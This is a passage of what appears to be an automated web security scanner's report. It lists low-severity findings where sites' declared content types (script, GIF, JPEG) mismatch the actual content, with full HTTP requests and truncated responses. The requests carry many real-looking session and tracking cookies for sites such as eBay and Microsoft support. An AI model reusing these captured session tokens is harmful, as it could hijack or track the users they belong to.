Cookie: cp_session=UihVIVUhVXFXP1UlUToJfVc4BD8AE1JpUCxaaQAgAHpQIgdrV3FQaQQnU1lSegZzAzQFJFZ2Bm4PZFdrUVhQKwNJCmEHSwQiUlgETgM%2FBzBSN1VUVSZVI1dXVWpROwk%2BVzIEIQBoUjtQdFp%2F; __utma=4935472.196986693.1311107154.1311107154.1311107154.1; __utmb=4935472.1.10.1311107154; __utmc=4935472; __utmz=4935472.1311107154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:50 GMT
Server: Apache
P3P: policyref="http://real.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Expires: Thu, 18 Aug 2011 20:25:50 GMT
Content-Length: 803
RNT-Time: D=112685 t=1311107150274311
RNT-Machine: 17
X-Cnection: close
Content-Type: application/opensearchdescription+xml; charset="utf-8"

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...

29.27. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://realnetworksrealarca.tt.omtrdc.net
Path:   /m2/realnetworksrealarca/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=2&profile.newhome=true&mbox=gh-newhome&mboxId=0&mboxTime=1311089157342&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1311107151665-897688; mboxPC=1311107151665-897688.17

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:25:51 GMT; Path=/m2/realnetworksrealarca
Content-Type: text/javascript
Content-Length: 91
Date: Tue, 19 Jul 2011 20:25:51 GMT
Server: Test & Target

mboxFactories.get('default').get('gh-newhome',0).setOffer(new mboxOfferDefault()).loaded();

29.28. http://res.mobileweb.ebay.com/nbinternal/nbblank.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://res.mobileweb.ebay.com
Path:   /nbinternal/nbblank.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain plain text.

Request

GET /nbinternal/nbblank.gif HTTP/1.1
Host: res.mobileweb.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobileweb.ebay.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83687^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf87%5Epsi%3DAsoIQKvY*%5E; PdsSession=43b29b151310a47a1206a656ffe78a00; PdsCGuid=43b29b151310a47a1206a656ffe78a00; emvcc=1; nborh=; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c798450070303^cguid/3666b2e01300a47a44d622a6ffc1937250070303^trm/svid%3D9431685814850070303^

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 19 Jul 2011 18:40:09 GMT
Cache-Control: max-age=7776000
Expires: Mon, 17 Oct 2011 18:40:09 GMT
Content-Type: image/.gif
Content-Length: 60
Date: Tue, 19 Jul 2011 18:40:09 GMT

R0lGODlhAQABAIAAADoSLQAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==

29.29. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=21661174 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQTRSRBT=BCEBMKKDBBGCPDLELDBDMCBE

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=21661174
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1da2"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:19:30 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

29.30. http://sharethis.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sharethis.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274; __uset=yes; __unam=8f891fa-13142cc749b-8ad1c19-4; __utma=79367510.1750911955.1311085721.1311085721.1311085721.1; __utmb=79367510.2.10.1311085721; __utmc=79367510; __utmz=79367510.1311085721.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 18:18:19 GMT
ETag: "10d403-57e-cf13b0c0"
Accept-Ranges: bytes
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1406
Connection: close

..............h.......(....... ...................................K...K...D~..K. ...r.D...L.&...s.L.&.M.(.M.(.C.#.D.$.D.$.M.,.M.-.D.).9}".C.).D.*.D.*.=}'.M.1.M.1.........C./.D./.C./.D.0.M.6.M.6.8.'.9.
...[SNIP]...

29.31. http://stubhub-www.baynote.net/baynote/tags3/common  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stubhub-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=stubhub&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: stubhub-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 18:36:23 GMT
Content-Length: 78212


                           baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

29.32. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stubhub.tt.omtrdc.net
Path:   /m2/stubhub/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/stubhub/mbox/standard?mboxHost=www.stubhub.com&mboxSession=1311100546147-926694&mboxPC=1308447436655-203098.17&mboxPage=1311100546147-926694&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxCount=1&pageType=BrowseTicketDetail&section=Concert%20tickets&mbox_channelId=1&mbox_genre_grand_parent_id=63914&mbox_genre_parent=602&mbox_event_id=906484&mbox=Global&mboxId=0&mboxTime=1311082546212&mboxURL=http%3A%2F%2Fwww.stubhub.com%2F%3Fticket_id%3D303237644%26GCID%3DC12289x970%26quantity_selected%3D2%26gtkw%3D-640518298&mboxReferrer=http%3A%2F%2Fbing.fansnap.com%2Fcheckout%2Findex%2F418563179%3Fctx%3Dc%253Dtix%253Bmt%253Dint%253Btsp%253D0%253Bdt%253D1%253Blpos%253D2%26ch%3Dbing%26quantity%3D2%26lp%3Dtrue%26poctx%3Drank%253D36%253BcrawlScore%253Dnull%253Bpop1%253D0.0374%253Bpop2%253D0.0374%253Bpop3%253D0.0374%253B%26afm%3D%26uet%3D-776896836%253A7925%253Apgstickets%257C%257Cbing%257Cmt%253Aint%253Bsz%253A1254%253Bid%253A389669&mboxVersion=40 HTTP/1.1
Host: stubhub.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 87
Date: Tue, 19 Jul 2011 18:36:22 GMT
Server: Test & Target

mboxFactories.get('default').get('Global',0).setOffer(new mboxOfferDefault()).loaded();

29.33. http://superpass.custhelp.com/ci/browserSearch/desc/http%3A%2F%2Fsuperpass.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://superpass.custhelp.com
Path:   /ci/browserSearch/desc/http%3A%2F%2Fsuperpass.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain XML.

Request

GET /ci/browserSearch/desc/http%3A%2F%2Fsuperpass.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png HTTP/1.1
Host: superpass.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=BX8FcQdzU3cGblQkVVUHfwNIATpQQ1ZtC3cAMw0tUigCcARoUXcNNAEiBw1WfgB1VmEGJ1V1AWkHbFFtXVRTKFEbAGsDT1ZwUlgETlZrDVoFYQUGBzlTJQYGVGtVPwcwA2YBJFA4Vj8LLwAl; __utma=152909883.1445521186.1311107156.1311107156.1311107156.1; __utmb=152909883.1.10.1311107156; __utmc=152909883; __utmz=152909883.1311107156.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:53 GMT
Server: Apache
P3P: policyref="http://superpass.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Expires: Thu, 18 Aug 2011 20:25:53 GMT
Content-Length: 813
RNT-Time: D=136838 t=1311107153075378
RNT-Machine: 17
X-Cnection: close
Content-Type: application/opensearchdescription+xml; charset="utf-8"

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...

29.34. http://support.microsoft.com/library/images/support/en-AU/askcasey_Btn.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.microsoft.com
Path:   /library/images/support/en-AU/askcasey_Btn.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /library/images/support/en-AU/askcasey_Btn.gif HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; ST_GN_EN-US=3_0_0; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; .ASPXANONYMOUS=7JLoELl8zAEkAAAAOTI0OWQ2ZjEtNGRlYy00MjhjLWE2MzQtNjdjZWQ2MzA1NzQ2BAzHeg-AofAXSSoSDS0rsC5ORYQ1; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/gif
Last-Modified: Fri, 18 Feb 2011 07:14:17 GMT
Accept-Ranges: bytes
ETag: "e96662743bcfcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:19:22 GMT
Content-Length: 1564

.PNG
.
...IHDR...0.........w..y....sRGB.........gAMA......a....    pHYs..........o.d....IDATXG..kPTe...........BI.)"...0..l.i...4S...+(#.&*
..(.(.w\X.].E..WE...(.........e...y.....,.7.......s...9 ..aC=
...[SNIP]...

29.35. http://support.microsoft.com/library/images/support/en-AU/askcasey_topqa.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.microsoft.com
Path:   /library/images/support/en-AU/askcasey_topqa.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /library/images/support/en-AU/askcasey_topqa.gif HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; wedcsinc=2; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; .ASPXANONYMOUS=7JLoELl8zAEkAAAAOTI0OWQ2ZjEtNGRlYy00MjhjLWE2MzQtNjdjZWQ2MzA1NzQ2BAzHeg-AofAXSSoSDS0rsC5ORYQ1; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311077969178:ss=1311077969178; ST_GN_EN-US=4_0_0; fmsmemo=st=|13083

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/gif
Last-Modified: Mon, 14 Mar 2011 07:29:16 GMT
Accept-Ranges: bytes
ETag: "f3ab7f8619e2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:19:22 GMT
Content-Length: 1038

.PNG
.
...IHDR.....................sRGB.........gAMA......a....    pHYs..........o.d....IDAThC.....A....|..@0.c1...x1.42.`3.X......XC.#cc.....o8S[U...3.S.twU.._..T.V...t.:....@G.#....t.:.....a..}2.

...[SNIP]...

29.36. https://support.microsoft.com/library/images/support/en-US/IE9_BG-img.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.microsoft.com
Path:   /library/images/support/en-US/IE9_BG-img.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /library/images/support/en-US/IE9_BG-img.jpg HTTP/1.1
Host: support.microsoft.com
Connection: keep-alive
Referer: https://support.microsoft.com/oas/default.aspx?gprid=assistance&st=1&wfxredirect=1&sd=gn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.NumberOfVisits=5&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:31:35&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=72&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; exitinfo=gp|1033|csa|en-us||L_174092; WFXSMCToken=1; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=4Xrk9Lp8zAEkAAAAYjg5MmIyNDgtMGJjYS00OGQxLTgxZGQtNGNhNWM5NWViODEwBZINl8tYmsqgVQ-Ji-Ezy2ZuByE1; AuthKey=SMC; WFXLANG=en-us; sdninc=8; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078786002:ss=1311077969178; wedcsinc=5; fmshb=0,1311089586085

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: image/jpeg
Last-Modified: Mon, 11 Apr 2011 05:04:15 GMT
Accept-Ranges: bytes
ETag: "a298c7e75f8cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:33:00 GMT
Content-Length: 58266

.PNG
.
...IHDR...............7.....sRGB.........gAMA......a....    pHYs..........o.d.../IDATx^.}...W.4qww......n@HH............
........._u{..L.6.}.{/..Lr........S..S.N..&g..yExl}.:.4bf1....X.......e..
...[SNIP]...

29.37. http://verify.authorize.net/anetseal/images/secure90x72.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://verify.authorize.net
Path:   /anetseal/images/secure90x72.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /anetseal/images/secure90x72.gif HTTP/1.1
Host: verify.authorize.net
Proxy-Connection: keep-alive
Referer: http://www.adminitrack.com/?gclid=COjL1IrNjaoCFQ495QodxUaNzg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2894
Content-Type: image/gif
Last-Modified: Fri, 26 Mar 2010 17:33:22 GMT
Accept-Ranges: bytes
ETag: "0dd746eacdca1:130f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:32 GMT

.PNG
.
